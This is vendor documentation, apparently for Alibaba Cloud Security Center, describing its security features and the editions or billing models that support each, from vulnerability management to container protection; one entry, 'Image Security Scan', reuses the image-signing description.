Features

Feature billing items

Feature menu

Overview

• Security Score

  • Feature description: This feature provides a comprehensive assessment of your cloud assets across two global data centers (China and global). It generates a health index on a scale of 0 to 100 by dynamically deducting points based on the real-time security status of your assets, such as alert events and configuration defects. A higher score indicates a better security posture. The index directly reflects existing security risks and the degree of remediation required.

  • Edition support: Supported by default in all editions.

• Security Posture Dashboard

  • Feature description: The Security Posture Dashboard transforms and visualizes security attack and defense data. It provides a comprehensive view of your current network security posture across three dimensions: the security status of your cloud assets, external attacks, and emerging threats. This helps you understand your security situation, promptly identify and resolve issues, and improve security management efficiency.

  • Edition support:

    Billing model	Support details
    Subscription	Advanced, Enterprise, and Ultimate: Requires the purchase of the Security Dashboard value-added service.
    Pay-as-you-go	Not supported.

Assets

• Cloud Asset Overview

  • Feature description: Provides a panoramic view of your cloud assets, network topology, security score, and asset security risks. It serves as a unified entry point for managing the security of your cloud assets.

  • Edition support:

    Billing model	Support details
    Subscription	Enterprise and Ultimate
    Pay-as-you-go	Enable the pay-as-you-go feature for Host and Container Security, and set the protection level for your servers to Host Protection or Hosts and Container Protection.

• Container Asset Overview

  • Feature description: Provides security visualization and management capabilities for clusters, containers, images, and applications. It also displays the network topology of your cloud container assets, helping you manage container security more efficiently.

  • Edition support:

    Billing model	Support details
    Subscription	Only supported in Ultimate.
    Pay-as-you-go	Enable the pay-as-you-go feature for Host and Container Security, and set the protection level for your servers to Hosts and Container Protection.

• Server List

  • Feature description: Displays information about the security status of all your servers, including protection status, group, region, and virtual private cloud (VPC) statistics.

  • Edition support: Supported by default in all editions.

• Asset Fingerprint Investigation

  • Feature description: Collects the following fingerprint data:

    • Account: Collects server account and permission information to inventory privileged accounts and detect privilege escalation.

    • Port: Collects and displays port listener information, allowing you to inventory open ports.

    • Process: Collects and displays process snapshot information, allowing you to inventory legitimate processes and detect abnormal ones.

    • Middleware: Collects middleware information to help you understand the middleware present on your assets.

    • Database: Collects database information to help you understand the databases present on your assets.

    • Web Service: Collects web service information to help you understand the web services present on your assets.

    • Software: Inventories installed software, allowing you to quickly locate affected assets when a high-risk vulnerability is discovered.

    • Scheduled Task: Collects scheduled task information, allowing you to promptly inventory the task paths on your assets.

    • Startup Item: Collects startup item information, allowing you to quickly locate the corresponding startup item when handling vulnerabilities.

    • Kernel Module: Collects kernel module information, allowing you to quickly locate the corresponding kernel module when handling vulnerabilities.

    • Website: Collects website information from your servers, helping you understand the details of the websites on your assets.

    • IDC Probe Finding: If an IDC probe is configured on an IDC server, this feature displays information about other IDC servers detected within the data center, helping you understand the basic situation of servers in your IDC.

  • Version support:

    Billing model	Support details
    Subscription	Only supported in Enterprise and Ultimate.
    Pay-as-you-go	Enable the pay-as-you-go feature for Host and Container Security, and set the protection level for your servers to Host Protection or Hosts and Container Protection.

• Security Check

  • Feature description: After you perform a one-click check, Security Center performs corresponding checks on the specified servers according to your configurations, such as vulnerability detection and baseline checks.

  • Version support:

    Billing model	Support details
    Subscription	Only supported in Advanced, Enterprise, and Ultimate.
    Pay-as-you-go	Enable the pay-as-you-go feature for Host and Container Security, and set the protection level for your servers to Host Protection or Hosts and Container Protection.

• Container Assets

  • Feature description: Provides security status statistics and risk information for all your clusters, pods, containers, and images.

  • Edition support:

    Billing model	Support details
    Subscription	Only supported in Ultimate.
    Pay-as-you-go	Enable the pay-as-you-go feature for Host and Container Security, and set the protection level for your servers to Hosts and Container Protection.

• Cloud Products

  • Feature description: Provides information related to the security status of your cloud products, including at-risk cloud products and statistics by cloud product category, such as Server Load Balancer and ApsaraDB RDS.

  • Edition support: Supported by default in all editions.

• Websites

  • Feature description: Provides information related to the security status of all your websites, including root domain names, subdomains, and statistics on their asset risk status and alert counts.

  • Edition support: Supported by default in all editions.

• Serverless Assets

  • Feature description: Supports runtime security risk detection for instances of Alibaba Cloud products that use a serverless architecture, such as Serverless App Engine (SAE) and serverless instances of Container Compute Service (ACS). It provides malicious file detection, vulnerability scanning, and compliance baseline checks.

  • Supported versions:

    Billing model	Support details
    Subscription	Not supported
    Pay-as-you-go	Enable the pay-as-you-go feature for Serverless Asset Protection.

Risk Governance

• Asset Exposure Analysis

  • Feature description: Scans and analyzes your Alibaba Cloud resources—including ECS instances, gateway assets, system components, and ports—to identify security risks and vulnerabilities exposed to the Internet. This helps you promptly discover and resolve issues to improve the security of your cloud resources.

  • Edition support:

    Billing model	Support details
    Subscription	Only supported in Enterprise and Ultimate.
    Pay-as-you-go	Enable the pay-as-you-go feature for Host and Container Security, and set the protection level for your servers to Host Protection or Hosts and Container Protection.

• Vulnerability Management

  • Feature description: Automatically discovers, assesses, and remediates security vulnerabilities on your servers. It provides automated vulnerability scanning and remediation solutions, replacing traditional manual patching methods, and is suitable for security operations and maintenance in large-scale server clusters.

    Scanning methods

    Vulnerability scanning supports two methods: manual scanning and automatic (periodic) scanning.

    • Manual scanning: Immediately assesses the vulnerability status of your servers.

    • Automatic scanning (periodic): Sets up periodic tasks to achieve automated and continuous vulnerability monitoring.

    Vulnerability remediation

    Vulnerability scanning supports the following three remediation methods:

    • One-click fix: Security Center provides a one-click fix feature in the console. This feature helps you automate vulnerability fixing without needing to log on to servers and perform manual operations.

      Important

      The one-click fix feature is not supported for Application Vulnerability and Urgent Vulnerability.

    • Automatic fix: You can turn on the Automatic Vulnerability Remediation switch and configure automatic fixing tasks to periodically fix newly discovered vulnerabilities within a specified period.

      Important

      • Automatic fixing tasks depend on the one-click fix feature. If the current edition or vulnerability type does not support one-click fix, automatic fixing is also not supported.

      • Automatic fixing is supported only for non-kernel Linux system vulnerabilities.

    • Manual fix: If the current edition or vulnerability type does not support one-click fix, or if the Vulnerability Fix feature is not enabled, you must log on to the server and follow the fixing suggestions in the vulnerability details to manually fix the vulnerability.

    Vulnerability types and remediation solutions

    • Linux Software Vulnerability:

      • Detection method: Compares software versions against the official CVE vulnerability database using an OVAL matching engine to generate alerts for vulnerabilities in the currently used software versions.

      • Remediation solution: Supports one-click remediation and one-click rollback through automated snapshot capabilities, making vulnerability remediation safer.

    • Windows System Vulnerability:

      • Detection method: Synchronizes with the official Microsoft patch source to detect and send reminders for high-risk and impactful vulnerabilities.

      • Remediation solution: Supports one-click remediation. It automatically identifies prerequisite patches required for vulnerability fixes, resolving issues where servers cannot be patched due to missing prerequisites. It also provides reminders for vulnerabilities that require a system restart, improving the efficiency of fixing Windows system vulnerabilities.

    • Web-CMS Vulnerability:

      • Detection method: Monitors website directories, identifies common content management systems (CMS), and detects vulnerabilities in the CMS by comparing vulnerability files.

      • Remediation solution: Provides self-developed vulnerability patches and supports one-click remediation by replacing or modifying files to fix vulnerabilities at the source code level.

    • Urgent Vulnerability:

      • Detection method: Provides detection services for emergency vulnerabilities that suddenly appear on the network.

      • Remediation solution: Does not support one-click remediation. You can log on to the server and fix the vulnerability manually based on the provided remediation suggestions.

    • Application Vulnerability:

      • Detection method: Provides detection capabilities for weak passwords in system services, system service vulnerabilities, and application service vulnerabilities.

      • Remediation solution: Does not support one-click remediation. You can log on to the server and fix the vulnerability manually based on the provided remediation suggestions.

  • Edition support:

    Service Model	Service Edition / Protection Level	Manual Scan Scope	Periodic Automatic Scan Scope	Vulnerability Fixing Capability
    Subscription	Enterprise Edition, Ultimate Edition	All	All	Supports fixing Linux, Windows, and Web-CMS vulnerabilities.
    	Advanced Edition	All vulnerabilities except Application Vulnerability.	All vulnerabilities except Application Vulnerability.	Supports fixing Linux and Windows vulnerabilities.
    	Basic Edition, Value-added Edition, Anti-virus Edition	Urgent Vulnerability only.	Linux Software Vulnerability, Windows System Vulnerability, Web-CMS Vulnerability.	Important To enable One-click Fix, you must purchase the separate Vulnerability Fix value-added service. For instructions, see Purchase Vulnerability Fixing (Subscription) and Activate Vulnerability Fixing (Pay-as-you-go). After purchase, supports fixing Linux and Windows vulnerabilities.
    Pay-as-you-go	Host Protection, Host and Container Protection	All	All
    	Unprotected, Anti-Virus	Urgent Vulnerability only.	Linux Software Vulnerability, Windows System Vulnerability, Web-CMS Vulnerability.

• Cloud Security Posture Management

  • Function Description: Cloud Security Posture Management (CSPM) identifies and manages security risks within cloud assets by performing automated risk checks, baseline scanning, and attack path analysis. This feature identifies security issues, such as cloud product configuration errors and server configuration defects, and offers remediation suggestions to mitigate security risks stemming from misconfigurations.

    • Cloud Product Configuration Risk Check: Scans the configurations of your cloud assets to identify configuration risks in multicloud environments across three scenarios: identity and permission management, cloud product security best practices, and compliance checks.

    • Baseline Risk Check: Performs deep inspection at the host (server) operating system level. Based on industry standards and security specifications, it discovers and fixes issues such as weak passwords, insecure configurations, or missing important patches to meet compliance requirements.

      Server Baseline Check

      • Check description:

        • Performs security configuration scans on servers through a task-based model and generates alerts for items that do not meet the standards.

        • Supports custom detection policies, allowing you to set check items, check cycles, and the server groups to which they apply. Custom check scripts are not currently supported.

        • Supports custom weak password rules. It periodically checks your cloud product baselines for these weak passwords based on your configured baseline policies and generates an alert if a match is found.

      • Detection scope:

        • High-risk exploits

          Detects risks such as unauthorized access vulnerabilities in CouchDB and Docker.

        • Container security

          Detects risks in Docker, Kubernetes master nodes, and Kubernetes nodes.

        • Classified protection compliance

          Checks for compliance with security baseline requirements for MLPS Level 3, MLPS Level 2, and international general security best practices.

        • Best security practices

          Checks for compliance with security baseline requirements for Linux, Windows, Redis, and more.

        • Weak passwords

          Detects weak passwords used for logging on to MongoDB, FTP, Linux systems, and more.

      Container Baseline Check

      • Check description: Provides security detection and alerts for container configurations. It performs risk checks on container baseline configurations for Kubernetes master and node nodes based on Alibaba Cloud's container security best practices.

      • Detection scope:

        • Alibaba Cloud Standard - Docker Security Baseline Check

          Based on Alibaba Cloud's best security practices for Docker baselines, it performs risk investigation and timely warnings from aspects such as Docker's security audit, service configuration, and file permissions.

        • Alibaba Cloud Standard - Kubernetes Master Security Baseline Check

          Baseline check for Kubernetes master nodes based on Alibaba Cloud's container security best practices.

        • Alibaba Cloud Standard - Kubernetes Node Security Baseline Check

          Baseline check for Kubernetes node nodes based on Alibaba Cloud's container security best practices.

    • Attack Path Analysis: Analyzes attack paths and potential risk points in the cloud by correlating risks such as vulnerabilities, exposed assets, and misconfigurations. It also supports posture analysis and management of cloud product configurations and potential attack paths in a unified console.

  • Edition support:

    Subscription

    • Purchase the Advanced, Enterprise, or Ultimate Edition

      Important

      If you are using the Anti-virus Edition or a value-added plan and have not purchased the CSPM value-added service, you can detect and verify free check items for Cloud Service Configuration Risk. However, risk remediation, System Baseline Risks, and Attack Path are not supported.

      Feature	Description	Quota consumption
      Cloud Service Configuration Risk	Check items: Free check items. Note The Ultimate Edition provides additional support for KSPM check items. Operations: Detection and verification are supported. Remediation is not supported.	Does not consume Quota.
      System Baseline Risks	Check items: Advanced Edition: Supports only weak password check items. Enterprise Edition: Supports all check items except for container security check items. Ultimate Edition: Supports all check items. Operations: Scanning, verification, and remediation are supported.	Included in the edition fee; does not consume Quota.
      Attack Path	Not supported	N/A

    • Purchase the CSPM value-added service

      Important

      If you purchase a service edition at the same time, feature support is as follows:

      • Advanced, Enterprise, or Ultimate Edition: The check items and operations supported for System Baseline Risks depend on your current edition. For more information, see the service description for the Advanced, Enterprise, or Ultimate Edition. The edition does not affect the Cloud Service Configuration Risk and Attack Path features. For more information, see the following table.

      • Anti-virus Edition and value-added plan: The edition does not affect the System Baseline Risks, Cloud Service Configuration Risk, and Attack Path features. For more information, see the following table.

      Feature	Description	Quota consumption
      Cloud Service Configuration Risk	Check items: All check items (free and paid). Operations: Detection, verification, and remediation are supported.	Free check items: Quota is consumed upon successful remediation. Paid check items: Quota is consumed upon a successful scan, verification, or remediation.
      System Baseline Risks	Check items: All check items. Operations: Detection, verification, and remediation are supported.	Quota is consumed upon each successful scan, verification, or remediation.
      Attack Path	Supported	This feature is included in the paid CSPM service and does not consume additional Quota.

    Pay-as-you-go

    You must enable the pay-as-you-go feature for CSPM.

    Important

    If you purchase only the Pay-as-you-go service for Host and Container Security, you can detect and verify free check items for Cloud Service Configuration Risk. However, risk remediation, System Baseline Risks, and Attack Path are not supported.

    Feature	Description	Quota consumption
    Cloud Service Configuration Risk	Check items: All check items (free and paid). Operations: Detection, verification, and remediation are supported.	Free check items: Quota is consumed upon successful remediation. Paid check items: Quota is consumed upon a successful scan, verification, or remediation.
    System Baseline Risks	Check items: All check items. Operations: Detection, verification, and remediation are supported.	Quota is consumed upon each successful scan, verification, or remediation.
    Attack Path	Supported	This feature is included in the paid CSPM service and does not consume additional Quota.

• AccessKey Leak Detection

  • Feature description: Monitors GitHub in real time to capture and determine whether publicly available source code contains AccessKey information for your Alibaba Cloud account.

  • Edition support: Supported by default in all editions.

• Cloud Honeypot

  • Feature description: Deploys instantly to build active defense capabilities both on and off the cloud. By deploying honeypots at key points in an attacker's path, it diverts attacks, tricking attackers into targeting decoy applications and obtaining false data. This prolongs the attack, records the complete attack behavior for traceability, captures advanced and unknown attacks, and can even counter-attack. It provides security operators and defenders with a proactive defense advantage.

  • Edition support:

    Billing model	Support details
    Subscription	Requires the purchase of the Cloud Honeypot value-added service
    Pay-as-you-go	Not supported.

• Malicious File Detection

  • Feature description:

    • File Detection SDK: Leverages the Security Center multi-engine detection platform to provide an easy-to-use malicious file detection service. You only need to write a small amount of code to identify malicious files.

    • OSS File Detection: Combines cloud-native advantages to support the detection of files in Alibaba Cloud Object Storage Service (OSS) buckets, accurately identifying malicious files.

    • Malicious File Handling: When a risk file (such as a webshell, mining program, or Trojan) is detected in an ECS instance or OSS bucket, an alert is generated. The malicious file detection feature provides methods such as whitelisting, ignoring, and blocking access to handle the detected malicious files.

  • Edition support:

    Billing model	Support details
    Subscription	Requires the purchase of the Malicious File Detection value-added service.
    Pay-as-you-go	Requires enabling the pay-as-you-go feature for Malicious File Detection.

• Log Analysis

  • Feature description: Centrally stores and manages security-related logs, providing a unified query and analysis entry point to help you quickly locate issues and meet compliance audit requirements.

    • Host logs: Records logon activity, process startups, account snapshots, DNS requests, and other logs. This can help you monitor user activity, system events, and application operations on your hosts to discover potential threats and optimize performance.

    • Security logs: Records security logs for vulnerabilities, baselines, security alerts, and cloud security posture management. This can help you observe security trends, improve security policies and defense mechanisms, and identify system weaknesses.

  • Edition support:

    Billing model	Support details
    Subscription	Anti-virus, Advanced, Enterprise, and Ultimate: Requires the purchase of the Log Analysis value-added service. Note For information about the specific log types supported by different editions, see Log types and field descriptions.
    Pay-as-you-go	Enable the pay-as-you-go service for Log Management. Note The Log Analysis feature has been integrated into Log Management. For more information, see Log Analysis to Log Management Migration Guide and Log Management.

Detection and Response

• Security Alerts

  • Feature description:

    • CWPP (Cloud Workload Protection Platform) security alerts:

      • Provides real-time detection of security alerts for hosts, containers, and cloud products. The detection scope covers activities such as processes, files, and network behavior on hosts and containers. Using threat detection models, it provides detection capabilities for issues including, but not limited to, abnormal process behavior, web shells, malware, vulnerability exploits, and container escapes. This helps you promptly discover security threats on your assets and maintain real-time awareness of your security posture.

      • In addition to various detection models, the precision defense model also provides interception capabilities for high-risk attack behaviors such as ransomware attacks, reverse shells, malicious command execution, loading of high-risk drivers, and planting of malicious files.

      • It also provides threat removal methods such as Virus Detection and Removal, Deep Cleanup, and Quarantine, and alert suppression methods such as Add to Whitelist and Ignore, to promptly handle security threats.

    • Network Defense Alert (formerly Attack Analysis): If you enable the Network Threat Prevention rules in Host Rules - Malicious Behavior Prevention and the Host Rules - Anti-Brute-Force policy, Security Center provides defense and interception capabilities against high-risk network attack behaviors such as malicious DNS requests, webshell uploads, adaptive web attack defense, and brute-force attacks. The Network Defense Alert page displays more information about the intercepted network attacks.

  • Edition support:

    Subscription

    Service Edition	Detection scope	Alert handling capabilities
    Basic and Value-added Plan	Common simple attacks in the cloud, including traditional one-line webshells, logons from uncommon locations, self-mutating Trojans, DDoS Trojans, and mining programs (does not include container assets).	Alert suppression: Add to Whitelist, Ignore, etc.
    Anti-virus	Capabilities of Basic + detection and precision defense models for suspicious and malicious files (including binaries) (does not include container assets).	Threat removal: Virus Detection and Removal, Deep Cleanup, Quarantine, etc. Alert suppression: Add to Whitelist, Ignore, etc.
    Advanced	Capabilities of Anti-virus + detection and precision defense models for suspicious and malicious process activities and file operations (does not include container assets).
    Enterprise	Capabilities of Advanced + over 380 detection and precision defense models for all malicious behaviors such as process activities, file operations, and network connections (does not include container assets).
    Ultimate	Capabilities of Enterprise (covering container assets) + detection and active defense models for container-specific attack behaviors such as container escapes, running risky images, and starting non-image programs.

    Pay-as-you-go

    Protection level	Detection scope	Alert handling capabilities
    Unprotected	Common simple attacks in the cloud, including traditional one-line webshells, logons from uncommon locations, self-mutating Trojans, DDoS Trojans, and mining programs (does not include container assets).	Alert suppression: Add to Whitelist, Ignore, etc.
    Antivirus	Capabilities of the Unprotected level + detection and precision defense models for suspicious and malicious files (including binaries) (does not include container assets).	Threat removal: Virus Detection and Removal, Deep Cleanup, Quarantine, etc. Alert suppression: Add to Whitelist, Ignore, etc.
    Host Protection	Capabilities of the Antivirus level + over 380 detection and precision defense models for all malicious behaviors such as process activities, file operations, and network connections (does not include container assets).
    Hosts and Container Protection	Capabilities of Host Protection (covering container assets) + detection and active defense models for container-specific attack behaviors such as container escapes, running risky images, and starting non-image programs.

• Security Event Handling

  • Feature description:

    • Security Center uses graph computing technology to aggregate related CWPP alerts (such as those with the same MD5 hash or parent process ID) into events. By assessing the impact of an event, executing handling actions to contain the threat, and hardening the system, you can prevent similar events from recurring.

    • Handling methods: Use Recommended Handling Policy, Add to Whitelist, Update Incident Status, and Run Playbook.

  • Edition support: Supported by default in all editions. However, the types of alerts that can be detected and used to generate events vary by edition.

• Log Management

  • Feature description: Supports storing and viewing Security Center logs, such as vulnerability logs, security alert logs, and client event logs. This helps you accurately locate alerts, perform attack attribution, and improve response speed.

  • Edition support:

    Billing model	Support details
    Subscription	Purchase Log Storage Capacity for the Threat Analysis value-added service. Important If you only purchase log ingestion traffic, storing and querying Security Center logs is not supported.
    Pay-as-you-go	Enable the pay-as-you-go service for Log Management.

Agentic SOC

When you enable the Agentic SOC service, services related to Detection and Response are moved under the Agentic SOC service. It also supports ingesting logs from third-party cloud products (such as Tencent Cloud and Huawei Cloud) and on-premises data centers.

• Feature description:

  • Product Integration: Provides a unified log integration center to help you centrally collect, standardize, and analyze log data from third-party clouds (such as Fortinet, Chaitin, Microsoft, Sangfor, Tencent Cloud, Huawei Cloud, Hillstone, and Dosin) and on-premises data centers.

  • Detection Rules: Performs in-depth detection and analysis of ingested alerts and logs, reconstructs threat attack chains and timelines, and generates correlated alerts and detailed security events. It also supports custom detection rules to build a threat detection system tailored to your business.

  • Security Alerts

    • Analyzes and processes logs ingested into Agentic SOC to generate alerts and events.

    • The CWPP Security Alerts feature is moved into the Agentic SOC Security Alerts feature.

  • Security Event Handling

    • Uses predefined or custom detection rules in Agentic SOC to analyze the context of multiple security alerts and aggregate them into complete events. It reconstructs the attack chain and extracts malicious entities to help you quickly respond to and handle cloud security risks.

    • The feature for aggregating CWPP alerts (such as those with the same MD5 hash or parent process ID) into security events is moved into Agentic SOC Security Event Handling.

    • Handling methods: In addition to Use Recommended Handling Policy, Update Incident Status, Run Playbook, and Add to Whitelist, it also supports automatic handling of security events (response orchestration).

  • Response Rules: Security Orchestration, Automation, and Response (SOAR) is a comprehensive security solution that orchestrates and connects different systems or services according to a certain logic to achieve automated operations and maintenance for security alerts and events. It aims to strengthen enterprise security defenses and improve security event response efficiency.

  • Log Management:

    • Standardized logs: Stores standardized alert logs generated by custom rules and standardized logs generated during Real-time Consumption through the standardized ingestion policy.

    • Security Center logs: The Log Management feature from Detection and Response is moved into the Agentic SOC Log Management feature.

  • Security Operations Agent: An advanced intelligent value-added service provided by Agentic SOC. With Agentic AI as its core engine, it deeply integrates Alibaba Cloud's native security data and infrastructure. It uses the agent's autonomous perception, inference, and execution capabilities to independently analyze security events, helping you achieve rapid security event response.

• Edition support:

  Billing model	Support details
  Subscription	Purchase the Threat Analysis value-added service. Important To support Security Center logs, you must purchase Log Storage Capacity for Threat Analysis.
  Pay-as-you-go	Enable the pay-as-you-go service for Threat Analysis.

Host Protection

• Anti-virus Scan

  • Feature description: Based on automated analysis of massive virus samples, persistence methods, and attack techniques, the Security Center expert team has launched Alibaba Cloud's machine learning-based anti-virus engine, enabling one-click virus scanning.

  • Edition support:

    Billing model	Support details
    Subscription	Anti-virus, Advanced, Enterprise, and Ultimate
    Pay-as-you-go	Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Antivirus, Host Protection, or Host and Container Protection.

• Host Rule Management

  • Feature description:

    • Malicious Behavior Defense: Supports system-built-in and custom malicious behavior prevention rules to harden server system security.

    • Defense Against Brute-force Attacks: Set anti-brute-force policies to prevent host resource account passwords from being cracked by brute-force attacks.

    • Common Logon Management: Set common logon locations, common logon IP addresses, common logon times, and common logon accounts to generate alerts for logons that fall outside the specified scope.

  • Edition support:

    Service model	Feature support details
    Subscription	Anti-virus Only supports whitelisting process hashes using custom rules in Malicious Behavior Defense. Only supports Common Logon Location management in Common Logon Management. Advanced Only supports Process Protection under System Defense Rule in Malicious Behavior Defense. Network defense is not supported. Supports all features of Defense Against Brute-force Attacks and Common Logon Management. Enterprise and Ultimate Supports all features of Malicious Behavior Defense, Defense Against Brute-force Attacks, and Common Logon Management.
    Pay-as-you-go	Enable the pay-as-you-go service for Host and Container Security, and bind a protection level to your servers. Antivirus Supports whitelisting process hashes using custom rules in Malicious Behavior Defense. Supports Common Logon Location management in Common Logon Management. Host Protection and Host and Container Protection: All features Supports all features of Malicious Behavior Defense, Defense Against Brute-force Attacks, and Common Logon Management.

• Core File Monitoring

  • Feature description: Provides real-time monitoring and alerting for operations such as accessing, modifying, deleting, and renaming files, reducing the risk of core files being stolen or tampered with.

  • Edition support:

    Billing model	Support details
    Subscription	Enterprise and Ultimate
    Pay-as-you-go	Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Host Protection or Host and Container Protection.

• Agentless Detection

  • Feature description: Uses agentless technology to scan and discover security risks such as ECS vulnerabilities, malicious files, and baseline configuration issues without installing a client.

  • Edition support:

    Billing model	Support details
    Subscription	Not supported
    Pay-as-you-go	Enable the pay-as-you-go feature for Agentless Detection under Host Protection.

• Anti-ransomware

  • Feature description: Supports backup and recovery for server and database files, mitigating the risks associated with ransomware attacks on servers and databases.

  • Edition support:

    Billing model	Support details
    Subscription	Purchase the Anti-ransomware value-added service.
    Pay-as-you-go	Enable the pay-as-you-go feature for Anti-ransomware under Host Protection.

• Web Tamper Protection

  • Feature description: Monitors website directories in real time and restores tampered files or directories from backups. This ensures that information on important systems is not maliciously altered and prevents the injection of web trojans, black links, and illegal content such as terrorist threats or pornography.

  • Edition support:

    Billing model	Support details
    Subscription	Purchase the Web Tamper Proofing value-added service.
    Pay-as-you-go	Enable the pay-as-you-go feature for Web Tamper Proofing.

Container Protection

• Active Container Protection

  • Feature description:

    • Risk Image Blocking

      This feature checks images for security risks and performs actions such as blocking, alerting, or allowing based on active container protection rules. This ensures that only images that meet your security requirements are started in the cluster.

    • Non-image Program Defense

      This feature detects and blocks the startup of programs that are not part of the original image during container runtime, actively defending against malware intrusion.

    • Container Escape Prevention

      This feature detects high-risk behaviors from multiple dimensions such as processes, files, and system calls. It establishes a protective barrier between the container and the host, effectively blocking escape attempts and ensuring container runtime security.

  • Edition support:

    Billing model	Support details
    Subscription	Ultimate
    Pay-as-you-go	Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Host and Container Protection.

• Container File Protection

  • Feature description: The container file protection feature monitors directories or files within containers in real time. When a directory or file is maliciously tampered with, it generates an alert or blocks the tampering behavior, preventing the injection of illegal information or malicious code files into applications.

  • Edition support:

    Billing model	Support details
    Subscription	Ultimate
    Pay-as-you-go	Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Host and Container Protection.

• Container Firewall

  • Feature description: The container firewall is a firewall service provided by Security Center for container environments. When a hacker intrudes into a container cluster by exploiting vulnerabilities or using malicious images, the container firewall will generate an alert or block the abnormal behavior.

  • Edition support:

    Billing model	Support details
    Subscription	Ultimate
    Pay-as-you-go	Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Host and Container Protection.

• Container Image Signing

  • Feature description: Supports trusted signing of container images to ensure that only approved container images are deployed. This prevents the startup of unauthorized, unsigned images and helps improve asset security.

    Note

    Currently, container image signing is only supported for Kubernetes clusters deployed in the China (Hong Kong) region.

  • Edition support:

    Billing model	Support details
    Subscription	Ultimate
    Pay-as-you-go	Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Host and Container Protection.

• Image Security Scan

  • Feature description: Enables trusted signing of container images to ensure that only approved images can be deployed. This prevents unsigned or unauthorized images from running and enhances the security of your assets.

    Note

    Only Kubernetes clusters deployed in China (Hong Kong) support container image signing.

  • Edition support:

    Billing model	Support details
    Subscription	Requires the purchase of the Container Image Scan value-added service. Important When purchasing, you can only buy the Container Image Scan value-added service if you select Advanced, Enterprise, Ultimate, or Value-added Plan.
    Pay-as-you-go	Not supported.

• CI/CD Integration Settings

  • Feature description: Supports detecting and identifying high-risk system vulnerabilities, application vulnerabilities, malicious viruses, webshells, malicious execution scripts, configuration risks, and sensitive data in images during the project build phase in Jenkins or GitHub. It also provides vulnerability remediation suggestions.

  • Edition support:

    Billing model	Support details
    Subscription	Requires the purchase of the Container Image Scan value-added service. Important When purchasing, you can only buy the Container Image Scan value-added service if you select Advanced, Enterprise, Ultimate, or Value-added Plan.
    Pay-as-you-go	Not supported.

Application Protection

• Feature description: Based on Runtime Application Self-Protection (RASP) technology, it provides security defense for applications by detecting attacks during application runtime and generating alerts or blocking the attacks. For more information, see What is Application Protection?.

• Edition support:

  Billing model	Support details
  Subscription	Purchase the Application Protection value-added service.
  Pay-as-you-go	Enable the pay-as-you-go service for Application Protection.

System Settings

• Task Hub

  • Feature description: Provides task management features. By executing tasks, you can automate and batch-remediate vulnerabilities on multiple servers.

  • Edition support:

    Billing model	Support details
    Subscription	Enterprise and Ultimate
    Pay-as-you-go	Enable pay-as-you-go for Vulnerability Fixing.

• Security Reports

  • Feature description: Customize the security data you want to follow and have it sent periodically to the mailboxes of relevant security personnel for more effective real-time monitoring of your asset security status.

  • Edition support:

    Billing model	Support details
    Subscription	Advanced, Enterprise, and Ultimate
    Pay-as-you-go	Enable any pay-as-you-go service.

• Feature Settings - Settings - Host Protection Settings

  • Feature description:

    • Proactive Defense

      Feature name	Overview
      Malicious Host Behavior Prevention	Helps you automatically block and remove common network viruses, including mainstream ransomware, DDoS Trojans, mining programs, Trojans, malicious programs, back doors, and worms.
      Anti-ransomware (Bait Capture)	Provides bait to capture new types of ransomware and automatically initiates defense against them through virus behavior analysis.
      Webshell Prevention	Helps you automatically block abnormal connections made by hackers through known web shells. You can also view alerts and quarantine samples in Security Alerts, and view quarantined samples in the quarantine box.
      User Experience Optimization in Proactive Defense	If a server shuts down abnormally or its security defense capabilities are compromised, Security Center will collect the server's Kdump data for security analysis to continuously improve the security defense experience.

    • Webshell Detection and Removal: Periodically detects web shells and Trojans in website servers and web directories.

    • Adaptive Threat Detection Capability: After you enable adaptive threat detection, if a high-risk intrusion event occurs on a server, Security Center will automatically enable strict alert mode for the server's client to detect hacker intrusions more quickly.

    • Alert Settings: Provides different alert modes for server alerts to meet your security needs in different application scenarios.

      • Balanced Mode: Alibaba Cloud aims to minimize false positives while detecting more potential risks.

        Note

        Security Center enables Balanced Mode by default for all connected servers.

      • Strict Mode: Provides a wider range of suspicious behavior alerts but comes with a higher risk of false positives. It is suitable for use during major events. Enable it with caution.

  • Edition support:

    Service model	Feature support details
    Subscription	Anti-virus: Proactive Defense: Malicious Host Behavior Prevention and Anti-ransomware (Bait Capture) Webshell Detection and Removal Alert Settings Advanced: Proactive Defense: Malicious Host Behavior Prevention, Anti-ransomware (Bait Capture), and Webshell Prevention Webshell Detection and Removal Alert Settings Enterprise and Ultimate: All features.
    Pay-as-you-go	Enable the pay-as-you-go service for Host and Container Security, and bind a protection level to your servers. Antivirus: Proactive Defense: Malicious Host Behavior Prevention and Anti-ransomware (Bait Capture) Webshell Detection and Removal Alert Settings Host Protection and Host and Container Protection: All features.

• Feature Settings > Settings > Container Protection Settings

  • Feature description:

    • Threat Detection on Kubernetes Containers: Monitors the security status of running container clusters in real time to help you promptly discover security risks and hacker intrusions. It supports the following check items:

      • Abnormal command execution in K8s API Server

      • Abnormal directory mounting in pods

      • Lateral movement using K8s Service Account

      • Startup of pods with malicious images

    • Container Escape Prevention: Detects high-risk behaviors from multiple dimensions such as processes, files, and system calls. It establishes a protective barrier between the container and the host, effectively blocking escape attempts and ensuring container runtime security.

  • Edition support:

    Service model	Feature support details
    Subscription	Ultimate
    Pay-as-you-go	Enable the pay-as-you-go service for Host and Container Security, and set the protection level for your servers to Host and Container Protection.

• Feature Settings - Settings - Client Capability Configuration

  • Feature description:

    • Agent Protection: After you enable client self-protection, attempts to uninstall the client without using the Security Center console will be actively blocked. This prevents attackers from directly intruding into the server to maliciously uninstall the client or from other programs mistakenly closing the client process.

    • Client Resource Management: Supports manual adjustment of the client's running mode to limit its resource consumption. This meets the protection needs of servers in various business scenarios and can achieve better security protection effects. It includes Low Consumption Mode, Smooth Mode, and Custom Mode.

    • Local File Detection Engine: The local file detection engine performs security checks on newly created script files and binary files on the server. It reports an alert when a security threat is detected.

    • In-depth Detection Engine: The deep detection engine helps you discover more in-depth security risks such as rootkits, tunnels, and back doors.

  • Edition support:

    Service model	Feature support details
    Subscription	Anti-virus and Advanced: Only supports Agent Protection and Client Resource Management (Low Consumption Mode and Smooth Mode). Enterprise and Ultimate: All features.
